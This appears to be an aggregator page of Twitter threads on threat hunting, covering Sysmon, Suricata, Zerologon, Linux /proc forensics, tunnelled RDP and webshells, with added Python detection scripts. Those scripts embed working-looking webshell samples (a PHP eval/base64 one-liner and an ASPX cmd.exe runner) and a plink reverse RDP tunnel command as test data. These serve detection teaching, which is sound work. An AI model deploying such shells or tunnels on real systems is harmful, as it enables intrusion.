Discover and read the best of Twitter Threads about #threathunting

Most recent (20)

Spent some time today at work playing with @msftsecurity Windows InstallerFileTakeOver LPE (CVE-2021-41379 bypass -…) and managed to create some detections on it.

Detection will be based on Sysmon/SIEM, here we go... 1/n #threathunting #detection #dfir
The exploit requires the user to overwrite elevation_service.exe with a compromised one (in this case with InstallerFileTakeOver.exe).
We can monitor this using #Sysmon event ID 11 - File Creation events:
event_id:11 AND event_data.TargetFilename:*\\elevation_service.exe
Read 14 tweets
mshtml.dll was loaded into the winword process. When is Microsoft MSHTML used? I guess it will be useful from a #threathunting perspective
based on sample:…
Other possibly suspicious loads: ExplorerFrame.dll, ieproxy.dll

#CVE-2021-40444 #DFIR #BlueTeam query on prod environment, last 30 days - 0 FP hits. via (MDATP) @MSThreatProtect
Read 3 tweets
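The two Sysmon hunts above (EID 11 FileCreate of elevation_service.exe, and EID 7 ImageLoad of mshtml.dll into Word) as runnable rule logic. This is an added example, not either author's SIEM query or MDATP query; the events are constructed, and the allow-list of expected writers is an assumption (browser updaters legitimately reinstall elevation_service.exe, so the writing Image is what separates the exploit from an update).

```python
"""Sysmon hunts for the two threads above, as an added example (not the
authors' queries): EID 11 FileCreate of elevation_service.exe and EID 7
ImageLoad of mshtml.dll (or ExplorerFrame.dll / ieproxy.dll) into an Office
process. The events below are constructed for the example, not real telemetry."""
from __future__ import annotations

# Field names follow the event_id / event_data.* layout of the SIEM query in
# the thread. Constructed sample: one true positive and one benign event per
# rule, plus an EID 7 load into iexplore.exe that must not fire.
SAMPLE_EVENTS = [
    {"event_id": 11, "event_data": {
        "Image": r"C:\Users\bob\Desktop\InstallerFileTakeOver.exe",
        "TargetFilename": r"C:\Program Files (x86)\Microsoft\Edge\Application\elevation_service.exe"}},
    {"event_id": 11, "event_data": {
        "Image": r"C:\Windows\System32\msiexec.exe",
        "TargetFilename": r"C:\Windows\Installer\MSI1A2B.tmp"}},
    {"event_id": 7, "event_data": {
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ImageLoaded": r"C:\Windows\System32\mshtml.dll"}},
    {"event_id": 7, "event_data": {
        "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "ImageLoaded": r"C:\Windows\System32\mshtml.dll"}},
    {"event_id": 7, "event_data": {
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "ImageLoaded": r"C:\Windows\System32\kernel32.dll"}},
]

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# mshtml.dll from the thread, plus the two further loads the author lists.
SUSPICIOUS_LOADS = {"mshtml.dll", "explorerframe.dll", "ieproxy.dll"}
# Assumed allow-list: browser updaters legitimately (re)install
# elevation_service.exe, so the writing Image separates exploit from update.
EXPECTED_WRITERS = {"microsoftedgeupdate.exe", "googleupdate.exe", "setup.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_elevation_service_overwrite(ev: dict) -> str | None:
    """EID 11: elevation_service.exe created by something other than an updater."""
    if ev["event_id"] != 11:
        return None
    d = ev["event_data"]
    if basename(d.get("TargetFilename", "")) != "elevation_service.exe":
        return None
    if basename(d.get("Image", "")) in EXPECTED_WRITERS:
        return None  # still worth logging, but not an alert on its own
    return f"elevation_service.exe written by {d.get('Image')}"


def rule_office_loads_mshtml(ev: dict) -> str | None:
    """EID 7: an Office process loads the MSHTML engine or its helpers."""
    if ev["event_id"] != 7:
        return None
    d = ev["event_data"]
    proc, dll = basename(d.get("Image", "")), basename(d.get("ImageLoaded", ""))
    if proc in OFFICE_PROCESSES and dll in SUSPICIOUS_LOADS:
        return f"{proc} loaded {dll}"
    return None


RULES = (rule_elevation_service_overwrite, rule_office_loads_mshtml)


def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """Run every rule over every event; return (rule name, finding) pairs."""
    hits = []
    for ev in events:
        for rule in RULES:
            finding = rule(ev)
            if finding:
                hits.append((rule.__name__, finding))
    return hits


if __name__ == "__main__":
    for name, finding in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {finding}")
```

The EID 11 rule keys on the writing process rather than the target path alone, because the bare `*\\elevation_service.exe` query will also fire on every Edge or Chrome update.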
If you want the quickest and easiest way to try out #SecurityOnion, just follow the screenshots below to install an Import node and then optionally enable the Analyst Workstation. This can be done in a minimal VM with only 4GB RAM!
Start Setup and choose Import node:
Read 17 tweets
Detection Quiz!💡
Look at the process creation events depicted below:
1. Can you recognise the technique?
2. Map it to the @MITREattack
3. Which tool was most likely used?
4. Detection ideas?

#ThreatHunting
Columns: Time, Parent, ParentIntegrityLevel, Child, ChildIntegrityLevel
Please, provide your answers in form of 1..2..3..4..
Read 20 tweets
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors WEB-site for further negotiations should their connection be limited via #TOR.
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC")
Read 11 tweets
Here is how to hunt/detect 60% (possibly more than 60%) of lateral movement attacks:
On ALL endpoints, look for EID 4624 with LogonType 9 (NewCredentials), and check TargetOutboundUserName field. 1/4
#threathunting #dfir #lateralmovement
Then, check if the TargetOutboundUserName is supposed to be seen on the endpoint. Here is why:
Attackers most likely spawn a new process on the compromised machine with the credentials/tokens they steal. This is done by using the "/NETONLY" flag. 2/4
The "/NETONLY" flag generates a new logon on the endpoint with the EID 4624 LogonType 9.
LogonType 9 is quite rare in an environment, usually <1% of all logon events. Therefore, it is quite easy to hunt for this event. 3/4
Read 4 tweets
I've had something in my mind now for a few years, but I never published it. So today, you're getting a short thread on "How to Prepare for #ThreatHunting Using the ABLE Framework".

Good threat hunting starts with a hypothesis. This is, loosely, an educated guess at a type of malicious activity which may be happening. @RobertMLee and I wrote a whitepaper on this, called "Generating Hypotheses for Successful Threat Hunting":…

Once you have the hypothesis, though, then what? That's where the ABLE framework comes in.

There are four key pieces of information you need to know to be ABLE (Ha! Get it?) to hunt. They are:


Read 9 tweets
(1/of a few) Doing some training #threathunting runs with #suricata -with pcap from
Fun fact: Alerts account for only 8% of the total logs produced - we also have protocol logs like Flow records, KRB5, SMB, DNS, TLS, HTTP, DCERPC, Fileinfo
(2/of a few)
Just the regular protocol and flow logging of #Suricata gives us:

633 FLOW logs
295 HTTP logs
182 TLS logs
130 DNS logs
114 SMB logs
90 DCERPC logs
66 FILEINFO logs
23 KRB5 logs
2 NTP logs

Let's see some examples of the generated data...
(3/of a few)
Quick and dirty cmd look at the DNS logs generated by #Suricata gives us the domain list for our #threathunting review
Couple of those jump out (at least to me)
Read 17 tweets
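A scripted version of the first pass described above: count eve.json records per event_type (which is where the alerts-vs-protocol-logs ratio comes from), pull the distinct DNS query names for review, and pre-sort the ones with a long, high-entropy leftmost label. This is an added example, not the author's commands; the eve.json excerpt is constructed rather than taken from the thread's pcap, and the length/entropy thresholds are assumptions.

```python
"""Quick first pass over a Suricata eve.json: per-event_type counts, the
distinct DNS query names, and a crude triage of odd-looking labels. Added
example, not the author's commands; the eve.json lines are constructed."""
from __future__ import annotations
import json
import math
from collections import Counter

# Constructed eve.json excerpt. Real records carry many more fields.
SAMPLE_EVE = """
{"timestamp":"2021-04-01T10:00:00.000000+0000","event_type":"flow","src_ip":"10.0.0.5","dest_ip":"10.0.0.2","proto":"UDP"}
{"timestamp":"2021-04-01T10:00:00.100000+0000","event_type":"dns","src_ip":"10.0.0.5","dest_ip":"10.0.0.2","dns":{"type":"query","rrname":"www.example.com","rrtype":"A"}}
{"timestamp":"2021-04-01T10:00:00.200000+0000","event_type":"dns","src_ip":"10.0.0.5","dest_ip":"10.0.0.2","dns":{"type":"answer","rrname":"www.example.com","rrtype":"A","rdata":"93.184.216.34"}}
{"timestamp":"2021-04-01T10:00:01.000000+0000","event_type":"dns","src_ip":"10.0.0.7","dest_ip":"10.0.0.2","dns":{"type":"query","rrname":"wpad.corp.local","rrtype":"A"}}
{"timestamp":"2021-04-01T10:00:02.000000+0000","event_type":"dns","src_ip":"10.0.0.7","dest_ip":"10.0.0.2","dns":{"type":"query","rrname":"a9x2kq7vlm3p.zz-cdn-edge.net","rrtype":"A"}}
{"timestamp":"2021-04-01T10:00:03.000000+0000","event_type":"http","src_ip":"10.0.0.7","dest_ip":"203.0.113.9","http":{"hostname":"a9x2kq7vlm3p.zz-cdn-edge.net","url":"/gate.php"}}
{"timestamp":"2021-04-01T10:00:04.000000+0000","event_type":"alert","src_ip":"10.0.0.7","dest_ip":"203.0.113.9","alert":{"signature":"ET MALWARE Example","severity":1}}
{"timestamp":"2021-04-01T10:00:05.000000+0000","event_type":"tls","src_ip":"10.0.0.5","dest_ip":"93.184.216.34","tls":{"sni":"www.example.com"}}
"""


def load_eve(text: str) -> list[dict]:
    """One JSON object per line; blank lines skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def event_type_counts(records: list[dict]) -> Counter:
    return Counter(r["event_type"] for r in records)


def alert_share(records: list[dict]) -> float:
    """Alerts as a fraction of all records (the thread saw about 8%)."""
    counts = event_type_counts(records)
    return counts["alert"] / sum(counts.values())


def dns_queries(records: list[dict]) -> Counter:
    """Distinct queried names with counts, from dns records of type 'query'."""
    return Counter(r["dns"]["rrname"].lower() for r in records
                   if r["event_type"] == "dns" and r["dns"].get("type") == "query")


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    counts = Counter(label)
    return -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())


def odd_looking(names, min_len: int = 10, min_entropy: float = 3.2) -> list[str]:
    """Crude triage (assumed thresholds): leftmost label long and high-entropy,
    the shape DGA and random-subdomain C2 names tend to have."""
    out = []
    for name in names:
        first = name.split(".")[0]
        if len(first) >= min_len and label_entropy(first) >= min_entropy:
            out.append(name)
    return out


if __name__ == "__main__":
    recs = load_eve(SAMPLE_EVE)
    print(event_type_counts(recs), f"alerts = {alert_share(recs):.0%}")
    for name, n in dns_queries(recs).most_common():
        print(f"{n:4d} {name}")
    print("review first:", odd_looking(dns_queries(recs)))
```

The entropy filter is only a sort order for the eyeball pass, not a detection: CDN and cloud hostnames also have random-looking labels, which is why the hit in the sample is worth checking against the http record that follows it rather than alerting on alone.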
A quick thread.

Review of the URLs submitted to URLhaus in the past 30 days.

53109 URLs reported; let's look for patterns which we can use for threat hunting and detection in DNS entries and proxy logs.

#infosec #cybersecurity #threathunting
25494 of the URLs end with Mozi.m, relating to the Mozi Botnet -…. To detect this, we can look for the regex pattern .*Mozi\.m$

A further 4636 of the URLs end with Mozi.a, related to the above. We can detect this using regex pattern .*Mozi\.a$
Finally, there are 10 URLs which contain Mozi within them in different patterns to above. It is therefore worthwhile searching for any case of Mozi within a URL (This will be greedier than the above, but still worthwhile checking)
Read 11 tweets
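The three Mozi checks from the thread applied in the order given, as an added example rather than the author's code: bucket each URL by the first pattern it matches, count the buckets, and split out hostnames, since the path-based regexes only apply to proxy logs while a DNS log only ever shows the hostname. The URL list is constructed, and reading "any case of Mozi" as case-insensitive is an assumption.

```python
"""URLhaus-style pattern triage for Mozi, as an added example (not the
author's code). The sample URLs are constructed, not URLhaus data."""
from __future__ import annotations
import re
from collections import Counter
from urllib.parse import urlsplit

MOZI_M = re.compile(r".*Mozi\.m$")              # the thread's first pattern
MOZI_A = re.compile(r".*Mozi\.a$")              # the thread's second pattern
MOZI_ANY = re.compile(r"Mozi", re.IGNORECASE)  # the greedier catch-all (case-insensitive: assumption)

# Constructed sample resembling URLhaus entries; not real URLhaus data.
SAMPLE_URLS = [
    "http://203.0.113.10:45678/Mozi.m",
    "http://203.0.113.11:33333/Mozi.m",
    "http://198.51.100.7:8080/Mozi.a",
    "http://198.51.100.9/bin/mozi.x86",
    "http://198.51.100.9/Mozi.m?x=1",        # a query string defeats the $ anchor
    "http://malware.example.net/update/payload.exe",
    "https://cdn.example.org/Mozi.m",
]


def classify(url: str) -> str:
    """First matching bucket in the thread's order, else 'other'."""
    if MOZI_M.match(url):
        return "mozi.m"
    if MOZI_A.match(url):
        return "mozi.a"
    if MOZI_ANY.search(url):
        return "mozi-other"
    return "other"


def bucket_counts(urls) -> Counter:
    """How many URLs each pattern would have caught."""
    return Counter(classify(u) for u in urls)


def hostnames(urls, buckets=("mozi.m", "mozi.a", "mozi-other")) -> set[str]:
    """Hostnames or IP literals of the flagged URLs, for DNS and proxy-destination matching."""
    return {urlsplit(u).hostname for u in urls if classify(u) in buckets}


if __name__ == "__main__":
    print(bucket_counts(SAMPLE_URLS))
    print(sorted(hostnames(SAMPLE_URLS)))
```

Note the `?x=1` case: the `$` anchor in `.*Mozi\.m$` means a URL with a trailing query string only reaches the third, greedier check, which is one reason the author keeps it.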
#Zerologon via @djrevmoon image h/t @ptswarm

> flaw in cryptographic auth Netlogon Remote Protocol
> insecure use of AES-CFB8
> when encrypting msg of all zeroes w all-zero IV, 1 in 256 chance output all zeroes

Test tool…
Alt exploit #Zerologon by @_dirkjan…
> jump off CVE-2015-0005 SMB
- weird logic set NetlogonValidationSamInfo4 to 6 nets plain text sessionkey for NTLM auth
> similarly relay to auth to RPC DRSUAPI
> 2 DCs


#respect
Read 4 tweets
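The "1 in 256" line above, worked through in code as an added example (not the test tool linked in the thread). In CFB8 each ciphertext byte is shifted into the IV register, so with an all-zero IV and all-zero plaintext the register never changes once the first keystream byte is zero, and every output byte is zero: the 8-byte Netlogon credential passes for roughly one session key in 256, and the attacker simply retries. To keep the block dependency-free, a keyed SHA-256 truncated to 16 bytes stands in for AES; that substitution is an assumption (the flaw is in the mode, not the cipher, so any block-sized keyed function shows it), and the CFB8 loop itself is the real mode.

```python
"""The AES-CFB8 flaw behind Zerologon, as an added example. A keyed SHA-256
truncated to one block stands in for AES (assumption: the behaviour is a
property of CFB8 with a zero IV, not of the block cipher)."""
import hashlib

BLOCK = 16


def toy_block(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES_k(block): a keyed PRF truncated to one block. NOT AES."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes, block_fn=toy_block) -> bytes:
    """CFB8: each plaintext byte is XORed with the first byte of E(register),
    then the resulting ciphertext byte is shifted into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_fn(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])  # zero in, zero register stays zero
    return bytes(out)


def zerologon_attempt(session_key: bytes) -> bool:
    """ComputeNetlogonCredential with an all-zero 8-byte client challenge and the
    all-zero IV: the attacker 'wins' when the computed credential is all zero."""
    return cfb8_encrypt(session_key, bytes(BLOCK), bytes(8)) == bytes(8)


def attempts_until_success(limit: int = 10000):
    """Model the attack loop: every attempt gets a fresh session key (here the
    attempt counter). Returns the attempt number that succeeded, or None."""
    for i in range(1, limit + 1):
        if zerologon_attempt(i.to_bytes(BLOCK, "big")):
            return i
    return None


def success_rate(n_keys: int = 8192) -> float:
    """Empirical fraction of session keys for which the zero credential passes."""
    return sum(zerologon_attempt(i.to_bytes(BLOCK, "big")) for i in range(n_keys)) / n_keys


if __name__ == "__main__":
    print("first success at attempt", attempts_until_success())
    print(f"success rate over 8192 keys: {success_rate():.4f} (expect about {1/256:.4f})")
```

The property the test pins down is exact, not statistical: for any key, the output is all zero if and only if the first byte of E(K, 0) is zero, which is why the success probability is 1/256 per attempt regardless of how good the cipher is.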
The wait is over.. Read the final part 2, which is focused on AWS log data ingestion, #hunting and investigation of the Capital One breach TTPs in #AzureSentinel…
T1078: Privileged role attached to Instance.
#AzureSentinel #MITRE #AWS #threathunting…
T1078 : Suspicious credential token access of valid IAM Roles
#AzureSentinel #MITRE #AWS #threathunting…
Read 5 tweets
Let's go step-by-step and do some basic live process forensics for #Linux. Today's contestant is a bindshell backdoor waiting for a connection on Ubuntu. We saw something odd when we ran:

netstat -nalp

#DFIR #threathunting #forensics
netstat -nalp shows a process named "x7" with a PID and a listening port that we don't recognize. #DFIR
First thing we'll do is list out /proc/<PID> to see what is going on. Our PID is 5805:

ls -al /proc/5805

The current working directory is /tmp. The binary was in /tmp, but was deleted. A lot of exploits work out of /tmp and /dev/shm on Linux. This is a major red flag. #DFIR
Read 13 tweets
Here's how to recover a #Linux binary from a malicious process that has deleted itself from the disk.

cp /proc/<PID>/exe /tmp/recovered_bin

Let's see how this works. #DFIR #threathunting #forensics
Often, malware deletes itself after it starts so file scanners and integrity checks won't find it. It can make analysis harder if you can't get to the binary easily.

But if you remember /proc/<PID>/exe you can recover any deleted binary.

#DFIR #threathunting #forensics
Use the sleep command to simulate a deleted process:

cd /tmp
cp /bin/sleep x
./x 3600 &
[1] 32031
rm x

This copies the sleep command as "x" under /tmp and runs for 3600 seconds. Then, delete "x" so the binary appears removed. Practice on it.

#DFIR #threathunting #forensics
Read 7 tweets
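The two Linux threads above (the /proc/<PID> triage and the `cp /proc/<PID>/exe` recovery) as one script, added here as an example rather than the author's commands. The assessment is a pure function over the two symlink targets so it can be exercised on constructed values; `scan_proc()` runs it over a live /proc, and `recover()` is the copy. The list of scratch directories is an assumption.

```python
"""Live /proc triage and binary recovery, as an added example (not the
author's commands). The kernel appends ' (deleted)' to the target of
/proc/PID/exe once the file is unlinked; the mapping keeps the inode alive,
so the content can still be copied out while the process runs."""
from __future__ import annotations
import os
import shutil

SCRATCH_DIRS = ("/tmp", "/dev/shm", "/var/tmp")  # assumption: common drop locations


def assess(pid: int, exe_target: str, cwd_target: str) -> list[str]:
    """Findings for one process given readlink(/proc/PID/exe) and readlink(/proc/PID/cwd)."""
    findings = []
    if exe_target.endswith(" (deleted)"):
        findings.append(f"pid {pid}: binary deleted from disk ({exe_target[:-10]})")
    for d in SCRATCH_DIRS:
        if exe_target == d or exe_target.startswith(d + "/"):
            findings.append(f"pid {pid}: executable runs from {d}")
        if cwd_target == d or cwd_target.startswith(d + "/"):
            findings.append(f"pid {pid}: working directory is {d}")
    return findings


def scan_proc(proc: str = "/proc") -> list[str]:
    """Walk /proc; needs root (or the same uid) to read other users' exe/cwd links."""
    findings = []
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            exe = os.readlink(f"{proc}/{name}/exe")
            cwd = os.readlink(f"{proc}/{name}/cwd")
        except (FileNotFoundError, PermissionError, ProcessLookupError):
            continue  # kernel threads have no exe; other users' links are unreadable
        findings.extend(assess(int(name), exe, cwd))
    return findings


def recover(pid: int, dest: str) -> str:
    """Copy the still-mapped executable out: the same as cp /proc/PID/exe dest.
    Only works while the process is alive; kill it and the inode is gone."""
    shutil.copyfile(f"/proc/{pid}/exe", dest)
    return dest


if __name__ == "__main__":
    for line in scan_proc():
        print(line)
```

Run the thread's `cp /bin/sleep x; ./x 3600 &; rm x` drill first and `scan_proc()` reports the sleep process three times (deleted binary, executable from /tmp, cwd /tmp); `recover(pid, "/root/recovered_bin")` then hands you the file to hash and analyse.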
Threat Hunting in #CyberSecurity: Waiting for an alert can be too dangerous.
Threat hunting means proactively searching for malware or attackers that are hiding in your network — and may have been there for some time.
Most of the time, the goal of this malware or these attackers is to quietly siphon off data, patiently listen in for confidential information, or work their way through the network looking for credentials powerful enough to steal key information.
Read 19 tweets
Only about two months later than I originally planned, but here we go. I'll summarise areas we are hiring into in the thread 👇, along with a steer on experience and location where possible (all UK, but happy to make introductions elsewhere).
We have space for a mix of junior and experienced folks in most roles, and there is also a mix of location and partial remote working options depending on the role, so please DM to ask clarification questions or to ask about applying :) A little background on the team:
Cyber Threat Operations is PwC's front-line technical security services group, responsible for a portfolio of blue & red team services to global clients. Blue includes subscription & bespoke #threatintel & research services, short-term & managed endpoint/network threat hunting,
Read 18 tweets
The basis for #SwearEngine is that malware developers are developers too. The catharses in their malware code manifest in a multitude of coarse expressions. Thus we can use the presence of swear words as a "weak signal" to surface interesting files. #threathunting
You may balk at #SwearEngine for being #basic but consider that this rule, looking for PEs with one single "fuck", detects malware samples used by APT5, APT10, APT18, APT22, APT26, Turla, FIN groups, dozens of UNC espionage clusters. Too many to list.
At least one single "fuck" is present in some samples of the following malware families: AGENTBTZ, ASCENTOR, ZXSHELL, SOGU, TRICKBOT, GHOST, VIPER, WANNACRY, WARP, NETWIRE, COREBOT, REMCOS, VIPER, ORCUSRAT, PONY, etc. I can't even name the coolest ones. There are hundreds.
Read 6 tweets
Mal devs themselves introduce some of the funniest & hi-fi (although short lived) detection opportunities. Amongst several applicable HTTP methodologies, we see "Content-Type:application/octect-stream." Don't manually type out your HPTP headers for your C2 protocolols. #dailypcap
This network traffic comes from newish backdoor ExileRAT (compiled 2019-01-30T07:05:47Z) 606e943b93a2a450c971291e394745a6 that was hanging (with a multitude of other evil) on recently #opendir "http://27.126.188[.]212" There are ties to a humongous cluster of probs CN espionage.
The attackers from IP 27.126.188[.]212 are rollin' deep with kit. (1) looks to be some derivative of python toolkit and also does some logging of connections. Sc.dat (2) is HTML that does JS get and creates a scheduled task for the exe.
Read 5 tweets
This is malware analysis 101 for most folks, but I thought I'd share a quick thread on easy .NET analysis using a recent wave of a malicious xlsx downloading PUBNUBRAT. cc @issuemakerslab @blackorbird and @navSi16 who all tweeted about this in Jan. #threathunting #dfir
88017e9f2c277fa05ee07ecc99a0a2dc (홍삼6품단가 .xlsx) is a doc that has multiple follow-on payloads including 05683b9a13910d768b7982d013c31cb9 (U3.conf)... see also 홀리데이 와이퍼(Operation Holiday Wiper)로 귀환한 로켓맨 APT 캠페인 ("The Rocket Man APT campaign returns as Holiday Wiper (Operation Holiday Wiper)") by @alac
05683b9a13910d768b7982d013c31cb9 (U3.conf) is a backdoor that uses the PubNub API (a legit service) for C2 (see @MITREattack's T1102). It's a .NET binary and without its config it doesn't do much in a sandbox. How do you detect network C2 over the PubNub API?
Read 8 tweets
My @FireEye friends @DavidPany and @deeemdee4 put out a badass blog on tunneled RDP. What is it? How is it used? What can you do to find it? Read more here:…
Tunneled RDP typically refers to an interactive RDP session that occurs over the same "channel" as another comms session. This is done in a variety of ways, but primarily established through either a backdoor implant or a utility with some sort of port forwarding setup.
On RDP tunneled over SSH with PLINK. We've seen the *standard* PLINK file used. We've also seen PLINK variants with hard-coded parameters and configs and whatnot.
Read 18 tweets
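Two hunts for the tunnelled RDP described above, added here as an example and not taken from the blog or the thread. The first keys on process-creation command lines with a plink/ssh port forward that touches 3389; the second keys on RemoteInteractive logons whose source address is the loopback, which is what a forward terminating on the victim produces. A PLINK variant with hard-coded parameters, as the author mentions, defeats only the first. Events are constructed; field names follow Sysmon EID 1 and Security EID 4624.

```python
"""Hunts for tunnelled RDP, as an added example (not the blog's queries).
Events are constructed; field names follow Sysmon EID 1 and Security EID 4624."""
from __future__ import annotations
import re

# -R/-L followed (after optional space) by a forward spec that ends in :3389
FORWARD_FLAG = re.compile(r"(?:^|\s)-[RL]\s*\S*:3389(?:\s|$)")
LOOPBACK = {"127.0.0.1", "::1"}

PROC_EVENTS = [  # constructed Sysmon EID 1 events
    {"EventID": 1, "Computer": "WS05", "Image": r"C:\Users\Public\plink.exe",
     "CommandLine": r"C:\Users\Public\plink.exe -pw Passw0rd -R 12345:127.0.0.1:3389 root@203.0.113.5"},
    {"EventID": 1, "Computer": "WS05", "Image": r"C:\Program Files\PuTTY\plink.exe",
     "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -batch git.example.net'},
    {"EventID": 1, "Computer": "WS06", "Image": r"C:\Windows\Temp\svchost.exe",
     "CommandLine": r"C:\Windows\Temp\svchost.exe"},  # hard-coded variant: no arguments to see
]
LOGON_EVENTS = [  # constructed Security EID 4624 events
    {"EventID": 4624, "Computer": "WS06", "LogonType": 10, "TargetUserName": "dave", "IpAddress": "127.0.0.1"},
    {"EventID": 4624, "Computer": "WS05", "LogonType": 10, "TargetUserName": "erin", "IpAddress": "10.0.0.40"},
    {"EventID": 4624, "Computer": "WS05", "LogonType": 3, "TargetUserName": "erin", "IpAddress": "127.0.0.1"},
]


def hunt_forward_cmdlines(events: list[dict]) -> list[tuple[str, str]]:
    """(host, command line) for EID 1 events whose arguments forward to or from 3389.
    Keys on the arguments, not the image name, so a renamed plink still hits."""
    return [(e["Computer"], e["CommandLine"]) for e in events
            if e.get("EventID") == 1 and FORWARD_FLAG.search(e.get("CommandLine", ""))]


def hunt_loopback_rdp(events: list[dict]) -> list[tuple[str, str]]:
    """(host, user) for RemoteInteractive (LogonType 10) logons arriving from loopback.
    An ordinary remote RDP client never appears as 127.0.0.1; a local forward always does."""
    return [(e["Computer"], e["TargetUserName"]) for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == 10
            and e.get("IpAddress") in LOOPBACK]


if __name__ == "__main__":
    for host, cmd in hunt_forward_cmdlines(PROC_EVENTS):
        print(f"[forward] {host}: {cmd}")
    for host, user in hunt_loopback_rdp(LOGON_EVENTS):
        print(f"[loopback RDP] {host}: {user}")
```

The constructed WS06 case is the one that matters: the renamed, hard-coded binary produces nothing for the command-line hunt, but the logon it enables still arrives from 127.0.0.1.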
I can hardly recall a security incident I worked on in which a webshell was not used at some stage, especially the incidents I worked on in our region (the Middle East). A thread of tweets about webshells and ideas for hunting them. #threathunting #dfir
A webshell is malware in the form of a script that targets web servers (usually ones reachable from the Internet) and supports a set of operations useful to the attacker, such as: transferring files/data to and from the system, executing commands, building tunnels, and so on...
Webshells are used in more than one stage of the attack life cycle, such as:
— Initial Foothold: after finding a vulnerability that allows uploading files to a web server, the attacker may use it to upload a webshell to the server, which gives them a foothold from which to continue.
Read 18 tweets
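A first-pass webshell hunt over a web root, added here as an example rather than the author's tooling. It scores each server-side script by attacker-controlled input (PHP superglobals, ASP.NET Request) reaching a code- or command-execution sink on the same line, adds weight for the usual obfuscation helpers, and records whether the file was modified recently. The sample files are constructed; the indicator lists, weights and thresholds are assumptions to tune per site.

```python
"""First-pass webshell hunt over a web root, as an added example (not the
author's tooling). Sample files are constructed; indicator lists, weights
and thresholds are assumptions."""
from __future__ import annotations
import os
import re
import tempfile
import time

SCRIPT_EXT = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".jspx"}
# Where attacker input enters (PHP superglobals, ASP.NET Request).
SOURCES = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|Request(?:\.(?:Form|QueryString|Item)|\[)", re.I)
# Where it becomes code or a command; the call paren is required so 'System.' alone is not a hit.
SINKS = re.compile(r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open"
                   r"|create_function|Process\.Start|Runtime\.getRuntime\(\)\.exec)\s*\(", re.I)
OBFUSCATION = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(|chr\(\d+\)\s*\.", re.I)


def score_source(text: str) -> dict:
    """Indicator counts plus a weighted score; a source and a sink on one line weighs most."""
    src_to_sink = sum(1 for line in text.splitlines() if SOURCES.search(line) and SINKS.search(line))
    sinks = len(SINKS.findall(text))
    obf = len(OBFUSCATION.findall(text))
    return {"source_to_sink_lines": src_to_sink, "sinks": sinks, "obfuscation": obf,
            "score": 10 * src_to_sink + 2 * obf + sinks}


def hunt_webroot(root: str, min_score: int = 10, recent_days: int = 30) -> list[dict]:
    """Walk the web root, score every script, return hits sorted by score."""
    cutoff = time.time() - recent_days * 86400
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in SCRIPT_EXT:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = score_source(fh.read())
            except OSError:
                continue
            if result["score"] >= min_score:
                hits.append({"name": fn, "path": path,
                             "recent": os.path.getmtime(path) >= cutoff, **result})
    return sorted(hits, key=lambda h: -h["score"])


# Constructed sample web root: a PHP one-liner shell, an ASPX command runner, a benign file.
SAMPLE_FILES = {
    "shell.php": "<?php @eval(base64_decode($_POST['x'])); ?>\n",
    "tools.aspx": '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>\n',
    "index.php": "<?php\nrequire 'vendor/autoload.php';\n$app = new App();\n$app->run();\n",
}


def build_sample_root() -> str:
    """Write the constructed files into a fresh temp directory; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in hunt_webroot(build_sample_root()):
        print(f"{hit['score']:3d} recent={hit['recent']} {hit['path']}")
```

Frameworks and templating engines legitimately call eval and friends, so the sink count alone is noise; the score is driven by input reaching a sink on the same line, and the recent-modification flag is what turns a hit into something to pull the web server's access log for.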
